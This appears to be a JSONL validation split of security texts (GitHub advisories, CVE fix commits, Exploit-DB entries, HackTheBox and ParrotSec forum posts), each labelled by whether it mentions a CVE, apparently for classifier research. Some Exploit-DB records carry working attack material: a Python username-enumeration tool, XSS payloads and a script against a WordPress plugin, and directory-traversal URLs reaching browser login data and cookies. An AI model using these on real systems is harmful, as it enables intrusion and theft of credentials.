+{"id": "c7b6ed353cb9f43806a8", "text": "`CHECK` fail in `TensorListScatter` and `TensorListScatterV2` in eager mode\n\n[Severity: LOW]\n\n### Impact\nAnother instance of CVE-2022-35991, where `TensorListScatter` and `TensorListScatterV2` crash via non scalar inputs in`element_shape`, was found in eager mode and fixed.\n```python\nimport tensorflow as tf\narg_0=tf.random.uniform(shape=(2, 2, 2), dtype=tf.float16, maxval=None)\narg_1=tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536)\narg_2=tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536)\narg_3=''\ntf.raw_ops.TensorListScatter(tensor=arg_0, indices=arg_1, \nelement_shape=arg_2, name=arg_3)\n```\n\n### Patches\nWe have patched the issue in GitHub commit [bf9932fc907aff0e9e8cccf769e8b00d30fd81a1](https://github.com/tensorflow/tensorflow/commit/bf9932fc907aff0e9e8cccf769e8b00d30fd81a1).\n\nThe fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by Pattarakrit Rattankul\n", "source": "github_advisory", "timestamp": "2022-11-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "273174b15f86c003b098", "text": "Engineering work on the project\n\nHi! Would you choose to work on a project with a compensation based on results (extra bonus for achievements and reduced base for failed project)? Taking in account that individual commitment and results will be measured?", "source": "go4expert", "timestamp": "2023-03-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a4339d46cb99982976ec", "text": "PHPJabbers Rental Property Booking 2.0 - Reflected XSS\n\n# Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS\n# Exploit Author: CraCkEr\n# Date: 22/07/2023\n# Vendor: PHPJabbers\n# Vendor Homepage: https://www.phpjabbers.com/\n# Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/\n# Version: 2.0\n# Tested on: Windows 10 Pro\n# Impact: Manipulate the content of the site\n# CVE: CVE-2023-4117\n\n\n## Greetings\n\nThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka\nCryptoJob (Twitter) twitter.com/0x0CryptoJob\n\n\n## Description\n\nThe attacker can send to victim a link containing a malicious URL in an email or instant message\ncan perform a wide variety of actions, such as stealing the victim's session token or login credentials\n\n\n\nPath: /index.php\n\nGET parameter 'index' is vulnerable to RXSS\n\nhttps://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=\n\n\n[-] Done", "source": "exploitdb", "timestamp": "2023-08-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2fb0d98356c4f793d9f0", "text": "ConnectWise Control 19.2.24707 - Username Enumeration\n\n# Exploit Title: ConnectWise Control 19.2.24707 - Username Enumeration\n# Date: 17/12/2021\n# Exploit Author: Luca Cuzzolin aka czz78\n# Vendor Homepage: https://www.connectwise.com/\n# Version: vulnerable <= 19.2.24707\n# CVE : CVE-2019-16516\n\n# https://github.com/czz/ScreenConnect-UserEnum\n\nfrom multiprocessing import Process, Queue\nfrom statistics import mean\nfrom urllib3 import exceptions as urlexcept\nimport argparse\nimport math\nimport re\nimport requests\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\nheaders = []\n\ndef header_function(header_line):\n headers.append(header_line)\n\n\ndef process_enum(queue, found_queue, wordlist, url, payload, failstr, verbose, proc_id, stop, proxy):\n try:\n # Payload to dictionary\n payload_dict = {}\n for load in payload:\n split_load = load.split(\":\")\n if split_load[1] != '{USER}':\n payload_dict[split_load[0]] = split_load[1]\n else:\n payload_dict[split_load[0]] = '{USER}'\n\n # Enumeration\n total = len(wordlist)\n for counter, user in enumerate(wordlist):\n user_payload = dict(payload_dict)\n for key, value in user_payload.items():\n if value == '{USER}':\n user_payload[key] = user\n\n dataraw = \"\".join(['%s=%s&' % (key, value) for (key, value) in user_payload.items()])[:-1]\n headers={\"Accept\": \"*/*\" , \"Content-Type\": \"application/x-www-form-urlencoded\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\"}\n\n req = requests.request('POST',url,headers=headers,data=dataraw, proxies=proxies)\n\n x = \"\".join('{}: {}'.format(k, v) for k, v in req.headers.items())\n\n if re.search(r\"{}\".format(failstr), str(x).replace('\\n','').replace('\\r','')):\n queue.put((proc_id, \"FOUND\", user))\n found_queue.put((proc_id, \"FOUND\", user))\n if stop: break\n elif verbose:\n queue.put((proc_id, \"TRIED\", user))\n queue.put((\"PERCENT\", proc_id, (counter/total)*100))\n\n except (urlexcept.NewConnectionError, requests.exceptions.ConnectionError):\n print(\"[ATTENTION] Connection error on process {}! Try lowering the amount of threads with the -c parameter.\".format(proc_id))\n\n\nif __name__ == \"__main__\":\n # Arguments\n parser = argparse.ArgumentParser(description=\"http://example.com/Login user enumeration tool\")\n parser.add_argument(\"url\", help=\"http://example.com/Login\")\n parser.add_argument(\"wordlist\", help=\"username wordlist\")\n parser.add_argument(\"-c\", metavar=\"cnt\", type=int, default=10, help=\"process (thread) count, default 10, too many processes may cause connection problems\")\n parser.add_argument(\"-v\", action=\"store_true\", help=\"verbose mode\")\n parser.add_argument(\"-s\", action=\"store_true\", help=\"stop on first user found\")\n parser.add_argument(\"-p\", metavar=\"proxy\", type=str, help=\"socks4/5 http/https proxy, ex: socks5://127.0.0.1:9050\")\n args = parser.parse_args()\n\n # Arguments to simple variables\n wordlist = args.wordlist\n url = args.url\n payload = ['ctl00%24Main%24userNameBox:{USER}', 'ctl00%24Main%24passwordBox:a', 'ctl00%24Main%24ctl05:Login', '__EVENTTARGET:', '__EVENTARGUMENT:', '__VIEWSTATE:']\n verbose = args.v\n thread_count = args.c\n failstr = \"PasswordInvalid\"\n stop = args.s\n proxy= args.p\n\n print(bcolors.HEADER + \"\"\"\n __ ___ __ ___\n| | |__ |__ |__) |__ |\\ | | | |\\/|\n|__| ___| |___ | \\ |___ | \\| |__| | |\n\nScreenConnect POC by czz78 :)\n\n \"\"\"+ bcolors.ENDC);\n print(\"URL: \"+url)\n print(\"Payload: \"+str(payload))\n print(\"Fail string: \"+failstr)\n print(\"Wordlist: \"+wordlist)\n if verbose: print(\"Verbose mode\")\n if st", "source": "exploitdb", "timestamp": "2022-01-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c360de1ee14e125b39a2", "text": "CVE: CVE-2022-29193\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.TensorSummaryV2` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix tf.raw_ops.TensorSummaryV2 vulnerability with invalid serialized_summary_metadata.\n\nCheck that input is actually a scalar before treating it as such.\n\nPiperOrigin-RevId: 445197183", "source": "cvefixes", "timestamp": "2022-05-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "541d4cff2924a34509d5", "text": "Unchecked Return Value to NULL Pointer Dereference in PDFDocumentHandler.cpp\n\n[Severity: HIGH]\n\n### Impact\nThe package muhammara before 2.6.0; all versions of package hummus are vulnerable to Denial of Service (DoS) when supplied with a maliciously crafted PDF file to be appended to another.\n\n### Patches\nIt has been patched in 2.6.0 for muhammara and not at all for hummus\n\n### Workarounds\nDo not process files from untrusted sources\n\n### References\nPR: https://github.com/julianhille/MuhammaraJS/pull/194\nIssue: https://github.com/julianhille/MuhammaraJS/issues/191\nIssue in hummus: https://github.com/galkahana/HummusJS/issues/293\n\n### Outline differences to https://nvd.nist.gov/vuln/detail/CVE-2022-25892\n\nThe difference is one is in [src/deps/PDFWriter/PDFParser.cpp](https://github.com/julianhille/MuhammaraJS/commit/1890fb555eaf171db79b73fdc3ea543bbd63c002#diff-09ac2c64aeab42b14b2ae7b11a5648314286986f8c8444a5b3739ba7203b1e9b) and the other is [PDFDocumentHandler.cpp](https://github.com/julianhille/MuhammaraJS/pull/194/files#diff-38d338ea4c047fd7dd9a05b5ffe7c964f0fa7e79aff4c307ccee7596457b1ef2) both is a null pointer but for different cases\nThese are totally diffent issues, one is in reading a pdf the other is in appendending a maliciously crafted one. The function calls are different the versions in which they are solved are diffent. ", "source": "github_advisory", "timestamp": "2022-11-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b64f054e72374b1052b8", "text": "CVE: CVE-2022-1432\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Generic in GitHub repository octoprint/octoprint prior to 1.8.0.'}]\n\nFix commit: 🔒️ Fix XSS in webcam stream test", "source": "cvefixes", "timestamp": "2022-05-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2bcf748b15dcf9bdb286", "text": "CVE: CVE-2021-43860\n\n[{'lang': 'en', 'value': 'Flatpak is a Linux application sandboxing and distribution framework. Prior to versions 1.12.3 and 1.10.6, Flatpak doesn\\'t properly validate that the permissions displayed to the user for an app at install time match the actual permissions granted to the app at runtime, in the case that there\\'s a null byte in the metadata file of an app. Therefore apps can grant themselves permissions without the consent of the user. Flatpak shows permissions to the user during install by reading them from the \"xa.metadata\" key in the commit metadata. This cannot contain a null terminator, because it is an untrusted GVariant. Flatpak compares these permissions to the *actual* metadata, from the \"metadata\" file to ensure it wasn\\'t lied to. However, the actual metadata contents are loaded in several places where they are read as simple C-style strings. That means that, if the metadata file includes a null terminator, only the content of the file from *before* the terminator gets compared to xa.metadata. Thus, any permissions that appear in the metadata file after a null terminator are applied at runtime but not shown to the user. So maliciously crafted apps can give themselves hidden permissions. Users who have Flatpaks installed from untrusted sources are at risk in case the Flatpak has a maliciously crafted metadata file, either initially or in an update. This issue is patched in versions 1.12.3 and 1.10.6. As a workaround, users can manually check the permissions of installed apps by checking the metadata file or the xa.metadata key on the commit metadata.'}]\n\nFix commit: Fix metadata file contents after null terminators being ignored\n\nIn particular, if a null terminator is placed inside the metadata file,\nFlatpak will only compare the text *before* it to the value of\nxa.metadata, but the full file will be parsed when permissions are set\nat runtime. This means that any app can include a null terminator in its\npermissions metadata, and Flatpak will only show the user the\npermissions *preceding* the terminator during install, but the\npermissions *after* the terminator are applied at runtime.\n\nFixes GHSA-qpjc-vq3c-572j / CVE-2021-43860\n\nSigned-off-by: Ryan Gonzalez ", "source": "cvefixes", "timestamp": "2022-01-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d26fdc02afda49cbea5e", "text": "I’m scratching my head as well I’ve found the injection point and trying to move the /flag.txt file to the /tmp folder but I’m getting Permission denied message while moving. Exact: “Error while moving: mv: cannot move ‘/flag.txt’ to ‘/tmp/flag.txt’: Permission denied” Strange thing is that I also don’t see any output when I make a obfuscated ls command. If anyone can send help me in the right direction?", "source": "hackthebox", "timestamp": "2022-11-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "316f63bd0227979246a6", "text": "This 2 methods work: netstat -l4 | grep “LISTEN” | grep -v “localhost” | wc -l you could also use a far less simple command → netstat -l | grep “tcp” | grep -v “tcp6” | grep -v “localhost” | wc -l ss -l4 | grep “LISTEN” | grep -v “127.0.0.*” | wc -l I am not sure why is needed since the filter -l should return listening only. If not used, then UDP services will list as well. Any clues why?", "source": "hackthebox", "timestamp": "2022-04-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1647c56607e7514dfdeb", "text": "Hmmm, that’s how it is. Then HINT becomes logical. Confused by their question. Why then do they ask for “brute force attack”. Inspect the login page and perform a bruteforce attack . What is the valid username? Thank you for the right direction of thought", "source": "hackthebox", "timestamp": "2022-07-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "3ea9fadf4a23a7a01058", "text": "i believe this should help anyone who needs it.. please do not hesitate to write at me for questions. Getting started | privilege escalation | quick solve Academy Hello, its x69h4ck3r here again. I am gonna make this quick. in other to solve this module, we need to gain access into the target machine via ssh. after that, we gain super user rights on the user2 user then escalate our privilege to root user. please follow my steps, will try to make this as easy as possible. Step 1: connect to target machine via ssh with the credential provided; example; ssh -l user1 -p Step 2: input the given password in the password field. NB: passwo…", "source": "hackthebox", "timestamp": "2022-07-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "36e2299c8ae252156bea", "text": "CVE: CVE-2022-2000\n\n[{'lang': 'en', 'value': 'Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5063: error for a command may go over the end of IObuff\n\nProblem: Error for a command may go over the end of IObuff.\nSolution: Truncate the message.", "source": "cvefixes", "timestamp": "2022-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "10d669c1192451be6249", "text": "Can only agree on the explanation - this particular module look like it skipped the qality control. Your comments made it more clear and easy after but the wording of the assessment is ****", "source": "hackthebox", "timestamp": "2022-11-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "089317a8426d4724af4e", "text": "I found a way to move files, I can even move .php into /tmp folder, however the app is not allowing me to move /flag.txt at all, I can jump back and forward into directories and move index.php at will, but not /flag.txt, it is frustrating", "source": "hackthebox", "timestamp": "2023-08-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "32c90bd7cd38c07e9d34", "text": "Assuming the term you used “hack” is joined with ethically. Parrot OS is designed for anyone to everyone. BTW You can learn hacking from tryhackme.com hackthebox is quite expensive… And seriously man its 2022, go for a Google search for quick results. HAPPY HACKING PAL!", "source": "parrotsec", "timestamp": "2022-11-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "81c53d305bcabc84cd9e", "text": "No I guess I wasn’t clear. I was scanning my network to try and find out what was going on. I was trying to figure out if Spectrums security picked up someone scanning from my IP? I’m still learning so this was more of a question. I didn’t start seeing the “suspicious activity” warnings until I started scanning", "source": "parrotsec", "timestamp": "2022-04-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "abd8d77415825e0e44c9", "text": "I think htb leaves something incomplete to make us solve ourselves and make experience. Anyway in the module there are all command that we need, if we pay attention to “MATCHER OPTIONS:” and “FILTER OPTIONS:” there are 3 options very useful, (-mr -mc -fs ). With -mc 200 we can match only “Status: 200”, with -mr “FLAG No. 1” we can match only the page with this word inside and last -fs skip all noise. ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H \"Host: FUZZ.inlanefreight.htb\" -u http://10.129.76.190 -mr \"FLAG No. 1\" -fs 10918 -mc 200", "source": "hackthebox", "timestamp": "2023-05-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "9018030ea754680bd46e", "text": "CVE: CVE-2022-21668\n\n[{'lang': 'en', 'value': \"pipenv is a Python development workflow tool. Starting with version 2018.10.9 and prior to version 2022.1.8, a flaw in pipenv's parsing of requirements files allows an attacker to insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims' systems. If an attacker is able to hide a malicious `--index-url` option in a requirements file that a victim installs with pipenv, the attacker can embed arbitrary malicious code in packages served from their malicious index server that will be executed on the victim's host during installation (remote code execution/RCE). When pip installs from a source distribution, any code in the setup.py is executed by the install process. This issue is patched in version 2022.1.8. The GitHub Security Advisory contains more information about this vulnerability.\"}]\n\nFix commit: Merge pull request from GHSA-qc9x-gjcv-465w\n\nfix TLS validation for requirements.txt", "source": "cvefixes", "timestamp": "2022-01-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "538f331ddd740786dfef", "text": "thanks g i was stuck there a min or 2 but i don’t get why i must subtracted 1 for the first number", "source": "hackthebox", "timestamp": "2023-09-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "add44921fc57e270f4a6", "text": "CVE: CVE-2022-21730\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `FractionalAvgPoolGrad` does not consider cases where the input tensors are invalid allowing an attacker to read from outside of bounds of heap. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Add negative bound check for row and column pooling_sequence in FractionalAvgPoolGrad op to avoid out of bound heap access\n\nPiperOrigin-RevId: 413837346\nChange-Id: I2b86034101df31bee161abcb781755e236c7bccd", "source": "cvefixes", "timestamp": "2022-02-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8368bca8a680c53c6a8c", "text": "Super Socializer 7.13.52 - Reflected XSS\n\n# Exploit Title: Super Socializer 7.13.52 - Reflected XSS\n# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com\n# Date: 2023-06-20\n# Exploit Author: Amirhossein Bahramizadeh\n# Category : Webapps\n# Vendor Homepage: https://wordpress.org/plugins/super-socializer\n# Version: 7.13.52 (REQUIRED)\n# Tested on: Windows/Linux\n# CVE : CVE-2023-2779\nimport requests\n\n# The URL of the vulnerable AJAX endpoint\nurl = \"https://example.com/wp-admin/admin-ajax.php\"\n\n# The vulnerable parameter that is not properly sanitized and escaped\nvulnerable_param = \" \"\n\n# The payload that exploits the vulnerability\npayload = {\"action\": \"the_champ_sharing_count\", \"urls[\" + vulnerable_param + \"]\": \"https://www.google.com\"}\n\n# Send a POST request to the vulnerable endpoint with the payload\nresponse = requests.post(url, data=payload)\n\n# Check if the payload was executed by searching for the injected script tag\nif \" \" in response.text:\n print(\"Vulnerability successfully exploited\")\nelse:\n print(\"Vulnerability not exploitable\")", "source": "exploitdb", "timestamp": "2023-06-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ad6dee4f0cd4ca099fc3", "text": "Cargo not respecting umask when extracting crate archives\n\n[Severity: HIGH]\n\nThe Rust Security Response WG was notified that Cargo did not respect the umask when extracting crate archives on UNIX-like systems. If the user downloaded a crate containing files writeable by any local user, another local user could exploit this to change the source code compiled and executed by the current user.\n\nThis vulnerability has been assigned CVE-2023-38497.\n\n## Overview\n\nIn UNIX-like systems, each file has three sets of permissions: for the user owning the file, for the group owning the file, and for all other local users. The \"[umask][1]\" is configured on most systems to limit those permissions during file creation, removing dangerous ones. For example, the default umask on macOS and most Linux distributions only allow the user owning a file to write to it, preventing the group owning it or other local users from doing the same.\n\nWhen a dependency is downloaded by Cargo, its source code has to be extracted on disk to allow the Rust compiler to read as part of the build. To improve performance, this extraction only happens the first time a dependency is used, caching the pre-extracted files for future invocations.\n\nUnfortunately, it was discovered that Cargo did not respect the umask during extraction, and propagated the permissions stored in the crate archive as-is. If an archive contained files writeable by any user on the system (and the system configuration didn't prevent writes through other security measures), another local user on the system could replace or tweak the source code of a dependency, potentially achieving code execution the next time the project is compiled.\n\n## Affected Versions\n\nAll Rust versions before 1.71.1 on UNIX-like systems (like macOS and Linux) are affected. Note that additional system-dependent security measures configured on the local system might prevent the vulnerability from being exploited.\n\nUsers on Windows and other non-UNIX-like systems are not affected.\n\n## Mitigations\n\nWe recommend all users to update to Rust 1.71.1, which will be released later today, as it fixes the vulnerability by respecting the umask when extracting crate archives. If you build your own toolchain, patches for 1.71.0 source tarballs are [available here][2].\n\nTo prevent existing cached extractions from being exploitable, the Cargo binary included in Rust 1.71.1 or later will purge the caches it tries to access if they were generated by older Cargo versions.\n\nIf you cannot update to Rust 1.71.1, we recommend configuring your system to prevent other local users from accessing the Cargo directory, usually located in `~/.cargo`:\n\n```\nchmod go= ~/.cargo\n```\n\n## Acknowledgments\n\nWe want to thank Addison Crump for responsibly disclosing this to us according to the [Rust security policy][3].\n\nWe also want to thank the members of the Rust project who helped us disclose the vulnerability: Weihang Lo for developing the fix; Eric Huss for reviewing the fix; Pietro Albini for writing this advisory; Pietro Albini, Manish Goregaokar and Josh Stone for coordinating this disclosure; Josh Triplett, Arlo Siemen, Scott Schafer, and Jacob Finkelman for advising during the disclosure.\n\n[1]: https://en.wikipedia.org/wiki/Umask\n[2]: https://github.com/rust-lang/wg-security-response/tree/main/patches/CVE-2023-38497\n[3]: https://www.rust-lang.org/policies/security", "source": "github_advisory", "timestamp": "2023-08-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "08aec5aae0401f1926ca", "text": "CVE: CVE-2021-37517\n\n[{'lang': 'en', 'value': 'An Access Control vulnerability exists in Dolibarr ERP/CRM 13.0.2, fixed version is 14.0.0,in the forgot-password function becuase the application allows email addresses as usernames, which can cause a Denial of Service.'}]\n\nFix commit: Fix Improper Authorization Check reported by Ahsan Aziz.", "source": "cvefixes", "timestamp": "2022-03-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "5dd30c89fa154971113c", "text": "io.netty:netty-codec-http2 vulnerable to HTTP/2 Rapid Reset Attack\n\n[Severity: HIGH]\n\nA client might overload the server by issue frequent RST frames. This can cause a massive amount of load on the remote system and so cause a DDOS attack. \n\n### Impact\nThis is a DDOS attack, any http2 server is affected and so you should update as soon as possible.\n\n### Patches\nThis is patched in version 4.1.100.Final.\n\n### Workarounds\nA user can limit the amount of RST frames that are accepted per connection over a timeframe manually using either an own `Http2FrameListener` implementation or an `ChannelInboundHandler` implementation (depending which http2 API is used).\n\n### References\n- https://www.cve.org/CVERecord?id=CVE-2023-44487\n- https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/\n- https://cloud.google.com/blog/products/identity-security/google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps/", "source": "github_advisory", "timestamp": "2023-10-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "3e4db00124830b37bee8", "text": "Hi I would also like to reply to this question as I also didnt understood what was asked… My understanding was that we had to find out what the EBP address was before we overwrite it with a payload. I think that would reflect the knowledge you have about this topic better. Also the question is very confusing. For the people that are stuck on this question just follow the same steps in the top of the read section and paste the value EBP has after you run it. Maybe for your own understanding try to find out the address of EBP before you over write it! (this is not answer to the question )", "source": "hackthebox", "timestamp": "2023-02-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "aaa19e2c9369cd3c15cc", "text": "Think about it, you installed network-manager, yet asked about netwokmanager and networkmanager, without a hyphen… Once youve installed it, you need to both enable it, and start it… sudo systemctl network-manager enable sudo systemctl network-manager start", "source": "parrotsec", "timestamp": "2023-07-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7fc9a4635ede2624b2c8", "text": "Stuck on Elasticity for several days. Could someone give me an small hint please? Any help will be appreciated.", "source": "hackthebox", "timestamp": "2022-02-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b0380ab705055733361b", "text": "Thanks for the hint of the smallest list. I enumerated zones properly and couldn’t figure out what I was doing wrong. For others reading this, he means start with the smallest list in SecLists/Discovery/DNS/ first, not subdomains-top1million-5000.txt which is what I initially assumed.", "source": "hackthebox", "timestamp": "2022-03-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "fee975461f428f5e2543", "text": "The tools for rooting androids are all on windows why would you need linux for this", "source": "parrotsec", "timestamp": "2023-09-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "ea97b9f3995e840eaa9a", "text": "Thanks. I will look that. If you find list of AD Mitre TTP, please write here!", "source": "hackersploit", "timestamp": "2022-04-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "15a0d3baaadd82e33925", "text": "CVE: CVE-2020-28461\n\n[{'lang': 'en', 'value': 'This affects the package js-ini before 1.3.0. If an attacker submits a malicious INI file to an application that parses it with parse , they will pollute the prototype on the application. This can be exploited further depending on the context.'}]\n\nFix commit: refactoring and new functional", "source": "cvefixes", "timestamp": "2022-07-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a94a09380f23546c46d1", "text": "First of all the module does not teach you extensively more about it. You have to research a little. this lesson is to teach you about subdomain or subdirectory in a website. so you can use gobuster also. Another thing to note is dont add -fs first. What -fs does is it select the common size of all the namelist you use on ffuf. so if you see common size in namelist in ffuf its gonna be some number(status, size, words, lines, duration) you will see all. But -fs is for size which means it is to get common size. I am writing this for myself and others so its gonna be easy for them. Dont look for answer rightaway.", "source": "hackthebox", "timestamp": "2023-11-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "060e5f3ff8c800f61f3c", "text": "Virtual Reception v1.0 - Web Server Directory Traversal\n\n# Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal\n# Exploit Author: Spinae\n# Vendor Homepage: https://www.virtualreception.nl/\n# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY\n# Tested on: all\n# CVE-ID: CVE-2023-25289\n\nWe discovered the web server of the Virtual Reception appliance is prone to\nan unauthenticated directory traversal vulnerability. This allows an\nattacker to traverse outside the server root directory by specifying files\nat the end of a URL request.\nThis is a NUC5i5RY\n\nhttp://[ip address]/c:/WINDOWS/System32/drivers/etc/hosts\nhttp://[ip address]/C:/windows/WindowsUpdate.log\n...\n\nA user called 'receptie' exists on the Windows system:\n\nhttp://[ip address]/c:/users/receptie/ntuser.dat\nhttp://[ip address]/c:/users/receptie/ntuser.ini\nhttp://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log\n...\nhttp://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User\nData/Default/Login Data\nhttp://[ip\naddress]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20State\nhttp://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User\nData/Default/Cookies\n...\n\nThe appliance also keeps a log of the visitors that register at the\nentrance:\n\nhttp://[ip address]/visitors.csv\n\nhash icon for shodan searches:\n\nhttps://www.shodan.io/search?query=http.favicon.hash%3A656388049\n\nNo reply from the vendor (phone, email, website form submissions), first\nreported in 2021.\n\n--\nDISCLAIMER: Unless indicated otherwise, the information contained in this\nmessage is privileged and confidential, and is intended only for the use of\nthe addressee(s) named above and others who have been specifically\nauthorized to receive it. If you are not the intended recipient, you are\nhereby notified that any dissemination, distribution or copying of this\nmessage and/or attachments is strictly prohibited. The company accepts no\nliability for any damage caused by any virus transmitted by this message.\nFurthermore, the company does not warrant a proper and complete\ntransmission of this information, nor does it accept liability for any\ndelays. If you have received this message in error, please contact the\nsender and delete the message. Thank you.", "source": "exploitdb", "timestamp": "2023-03-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9d34ddfe263a0419f477", "text": "CVE: CVE-2021-3609\n\n[{'lang': 'en', 'value': '.A flaw was found in the CAN BCM networking protocol in the Linux kernel, where a local attacker can abuse a flaw in the CAN subsystem to corrupt memory, crash the system or escalate privileges. This race condition in net/can/bcm.c in the Linux kernel allows for local privilege escalation to root.'}]\n\nFix commit: can: bcm: delay release of struct bcm_op after synchronize_rcu()\n\ncan_rx_register() callbacks may be called concurrently to the call to\ncan_rx_unregister(). The callbacks and callback data, though, are\nprotected by RCU and the struct sock reference count.\n\nSo the callback data is really attached to the life of sk, meaning\nthat it should be released on sk_destruct. However, bcm_remove_op()\ncalls tasklet_kill(), and RCU callbacks may be called under RCU\nsoftirq, so that cannot be used on kernels before the introduction of\nHRTIMER_MODE_SOFT.\n\nHowever, bcm_rx_handler() is called under RCU protection, so after\ncalling can_rx_unregister(), we may call synchronize_rcu() in order to\nwait for any RCU read-side critical sections to finish. That is,\nbcm_rx_handler() won't be called anymore for those ops. So, we only\nfree them, after we do that synchronize_rcu().\n\nFixes: ffd980f976e7 (\"[CAN]: Add broadcast manager (bcm) protocol\")\nLink: https://lore.kernel.org/r/20210619161813.2098382-1-cascardo@canonical.com\nCc: linux-stable \nReported-by: syzbot+0f7e7e5e2f4f40fa89c0@syzkaller.appspotmail.com\nReported-by: Norbert Slusarek \nSigned-off-by: Thadeu Lima de Souza Cascardo \nAcked-by: Oliver Hartkopp \nSigned-off-by: Marc Kleine-Budde ", "source": "cvefixes", "timestamp": "2022-03-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "60f6e560d5aa51990348", "text": "CVE: CVE-2022-24786\n\n[{'lang': 'en', 'value': 'PJSIP is a free and open source multimedia communication library written in C. PJSIP versions 2.12 and prior do not parse incoming RTCP feedback RPSI (Reference Picture Selection Indication) packet, but any app that directly uses pjmedia_rtcp_fb_parse_rpsi() will be affected. A patch is available in the `master` branch of the `pjsip/pjproject` GitHub repository. There are currently no known workarounds.'}]\n\nFix commit: Merge pull request from GHSA-vhxv-phmx-g52q\n\n* Prevent OOB read/write when parsing RTCP FB RPSI\n\n* Add log information\n\n* Modification based on comments.", "source": "cvefixes", "timestamp": "2022-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
